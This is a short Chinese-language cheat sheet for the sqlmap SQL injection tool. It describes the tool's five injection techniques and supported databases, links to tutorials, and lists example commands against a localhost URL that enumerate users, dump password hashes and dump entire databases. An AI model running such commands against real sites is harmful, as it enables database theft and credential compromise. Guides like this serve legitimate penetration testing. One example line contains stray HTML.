sqlmap helper

当给sqlmap一个url的时候,它会:

1、判断可注入的参数

2、判断可以用那种SQL注入技术来注入

3、识别出哪种数据库

4、根据用户选择,读取哪些数据

sqlmap支持五种不同的注入模式:

1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。

2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。

3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。

4、联合查询注入,可以使用union的情况下的注入。

5、堆查询注入,可以同时执行多条语句的执行时的注入。


sqlmap支持的数据库有:

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB

可以提供一个简单的URL,Burp或WebScarab请求日志文件,文本文档中的完整http请求或者Google的搜索,匹配出结果页面,也可以自己定义一个正则来判断那个地址去测试。

测试GET参数,POST参数,HTTP Cookie参数,HTTP User-Agent头和HTTP Referer头来确认是否有SQL注入,它也可以指定用逗号分隔的列表的具体参数来测试。

可以设定HTTP(S)请求的并发数,来提高盲注时的效率。

Youtube上有人做的使用sqlmap的视频:
   http://www.youtube.com/user/inquisb/videos

http://www.youtube.com/user/stamparm/videos
使用sqlmap的实例文章:
http://unconciousmind.blogspot.com/search/label/sqlmap
http://www.91ri.org/4714.html
http://www.91ri.org/3574.html
http://drops.wooyun.org/tips/2113     
http://drops.wooyun.org/tips/143
eg: 
sqlmap.py -u "http://127.0.0.1/list.asp?id=1" --is-dba -v #是否dba
sqlmap.py -u "http://127.0.0.1/list.asp?id=1" --users     #取用户
sqlmap.py -u "http://127.0.0.1/list.asp?id=1" --passwords  #取密码
sqlmap.py -u "http://127.0.0.1/list.asp?id=1" --privileges #当前权限
sqlmap.py -u "http://127.0.0.1/list.asp?id=1" --dbs  #所有数据库
sqlmap.py -u "http://127.0.0.1/list.asp?id=1" --tables -D "test" #test库的所有表
sqlmap.py -u "http://127.0.0.1/list.asp?id=1" --columns -T "dbo.user" -D "test"#test库user表的所有列
sqlmap.py -u "http://127.0.0.1/list.asp?id=1" --dump -T "dbo.user" --start 1 --stop 4 #user表1-4行的数据
sqlmap.py -u "http://127.0.0.1/list.asp?id=1" --dump-all #脱裤
sqlmap.py -u "http://127.0.0.1/list.asp" --cookie "id=1" --dbs --level 2 #cookie注入
sqlmap.py -u "http://127.0.0.1/list.asp?id=1" --count -D test #count数据量
sqlmap.py -u  "http://127.0.0.1/list.asp" --method POST --data  "id=1" # post提交
sqlmap.py -u  "http://127.0.0.1/list.asp" --referer  "http://www.google.com" -v  3  #referer伪造
sqlmap.py -u  http://127.0.0.1/list.asp target="_blank">?id=1 -v 1 --current-user  --threads 3 #多线程猜解
sqlmap.py  -u http://127.0.0.1/list.asp?id=1 -v 2 --dbms  "PostgreSQL" #指定数据库

发表评论